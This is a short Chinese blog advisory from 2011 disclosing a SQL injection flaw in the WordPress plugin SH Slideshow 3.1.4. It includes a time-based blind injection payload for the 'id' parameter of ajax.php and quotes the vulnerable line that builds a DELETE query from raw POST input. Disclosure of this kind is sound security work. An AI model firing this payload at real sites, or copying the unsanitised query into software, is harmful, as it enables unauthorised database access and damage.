WordPress插件SH Slideshow

下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
影响版本: 3.1.4 (已测试)

—————

测试方法

—————

http://www.unhonker.com/wp-content/plugins/sh-slideshow/ajax.php

id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20
—————

缺陷代码分析

—————

$result = $wpdb->query(‘delete from sh_slides where id = ‘.$_POST[‘id’]);

本文固定链接: https://www.unhonker.com/technical/158.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年08月31日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress插件SH Slideshow | 90' s Blog|关注网络信息安全

WordPress插件SH Slideshow:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!